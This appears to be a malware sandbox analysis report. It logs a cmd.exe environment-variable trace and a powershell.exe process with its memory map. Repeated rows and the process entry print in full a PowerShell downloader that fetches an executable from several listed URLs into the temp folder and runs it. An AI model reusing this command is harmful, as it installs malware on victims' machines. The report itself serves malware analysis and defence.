| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process $nLF;break |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process $nLF;break} |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process $nLF;break}} |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process $nLF;break}}c |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process $nLF;break}}ca |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process $nLF;break}}cat |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process $nLF;break}}catc |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process $nLF;break}}catch |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process $nLF;break}}catch{ |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process $nLF;break}}catch{} |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process $nLF;break}}catch{}} |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process $nLF;break}}catch{}} |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process $nLF;break}}catch{}} |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process $nLF;break}}catch{}} |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process $nLF;break}}catch{}} |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process $nLF;break}}catch{}} |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process $nLF;break}}catch{}} |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process $nLF;break}}catch{}} |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process $nLF;break}}catch{}} |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process $nLF;break}}catch{}} |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process $nLF;break}}catch{}} |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process $nLF;break}}catch{}} |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process $nLF;break}}catch{}} |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process $nLF;break}}catch{}} |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process $nLF;break}}catch{}} |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process $nLF;break}}catch{}} |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process $nLF;break}}catch{}} |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process $nLF;break}}catch{}} |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\aETAdzjz\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 |
Process #4: powershell.exe
594
6
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$EHT.savetofile($nLF);Start-Process $nLF;break}}catch{}} |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:09, Reason: Child Process |
| Unmonitor | End Time: 00:01:56, Reason: Self Terminated |
| Monitor Duration | 00:00:47 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xabc |
| Parent PID | 0xa84 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
AC0
0x
AC4
0x
AC8
0x
ACC
0x
AD0
0x
AD4
0x
AE8
0x
AEC
0x
AF0
0x
AF4
0x
AFC
0x
B00
0x
B04
0x
BF0
0x
8A0
0x
8D8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| powershell.exe.mui | 0x000e0000 | 0x000e2fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x0011ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000120000 | 0x00120000 | 0x00120fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x001affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x001d0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x001e1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x0026ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x0036ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x0046ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000470000 | 0x00470000 | 0x005f7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000600000 | 0x00600000 | 0x00780fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000790000 | 0x00790000 | 0x01b8ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001b90000 | 0x01b90000 | 0x01c6efff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x01c70000 | 0x01c73fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001c80000 | 0x01c80000 | 0x01c8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001c90000 | 0x01c90000 | 0x01d8ffff | Private Memory | rw |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x01d90000 | 0x01daffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001db0000 | 0x01db0000 | 0x01db0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x01dc0000 | 0x01deffff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x01df0000 | 0x01df3fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001e00000 | 0x01e00000 | 0x01e00fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001e10000 | 0x01e10000 | 0x01e12fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000001e20000 | 0x01e20000 | 0x01e20fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001e30000 | 0x01e30000 | 0x01e3ffff | Private Memory | rw |
|
|
|
- |
| l_intl.nls | 0x01e40000 | 0x01e42fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001e50000 | 0x01e50000 | 0x01ecffff | Private Memory | rw |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x01ed0000 | 0x01f35fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001f40000 | 0x01f40000 | 0x01fbffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01fc0000 | 0x0228efff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002290000 | 0x02290000 | 0x02682fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002690000 | 0x02690000 | 0x02690fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000026a0000 | 0x026a0000 | 0x026bffff | Private Memory | - |
|
|
|
- |
| sorttbls.nlp | 0x026c0000 | 0x026c4fff | Memory Mapped File | r |
|
|
|
- |
| microsoft.wsman.runtime.dll | 0x026d0000 | 0x026d7fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000026e0000 | 0x026e0000 | 0x026e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000026f0000 | 0x026f0000 | 0x0276ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002770000 | 0x02770000 | 0x027effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000027f0000 | 0x027f0000 | 0x027f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000027f0000 | 0x027f0000 | 0x02800fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002810000 | 0x02810000 | 0x0288ffff | Private Memory | rwx |
|
|
|
- |
| sortkey.nlp | 0x02890000 | 0x028d0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002930000 | 0x02930000 | 0x0293ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002940000 | 0x02940000 | 0x02a3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a70000 | 0x02a70000 | 0x02aeffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002af0000 | 0x02af0000 | 0x1aaeffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001aaf0000 | 0x1aaf0000 | 0x1b1bffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001b1c0000 | 0x1b1c0000 | 0x1b2c0fff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x1b2d0000 | 0x1b38ffff | Memory Mapped File | rw |
|
|
|
- |
| mscorrc.dll | 0x1b390000 | 0x1b3e3fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000001b480000 | 0x1b480000 | 0x1b4fffff | Private Memory | rw |
|
|
|
- |
| system.management.automation.dll | 0x1b500000 | 0x1b7e1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000001b7f0000 | 0x1b7f0000 | 0x1b8effff | Private Memory | rw |
|
|
|
- |
| system.transactions.dll | 0x1e230000 | 0x1e278fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr80.dll | 0x75470000 | 0x75538fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x77e00000 | 0x77e06fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| powershell.exe | 0x13f600000 | 0x13f676fff | Memory Mapped File | rwx |
|
|
|
- |
| culture.dll | 0x642ff4a0000 | 0x642ff4a9fff | Memory Mapped File | rwx |
|
|
|
- |
| system.directoryservices.ni.dll | 0x7fedf3c0000 | 0x7fedf554fff | Memory Mapped File | rwx |
|
|
|
- |
